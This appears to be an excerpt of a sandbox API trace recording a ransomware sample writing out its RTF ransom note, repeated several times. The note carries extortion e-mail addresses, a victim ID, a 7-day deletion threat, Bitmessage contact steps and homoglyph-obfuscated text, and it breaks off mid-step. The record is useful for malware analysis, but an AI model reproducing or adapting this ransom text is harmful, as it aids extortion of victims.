EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ed4f78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick 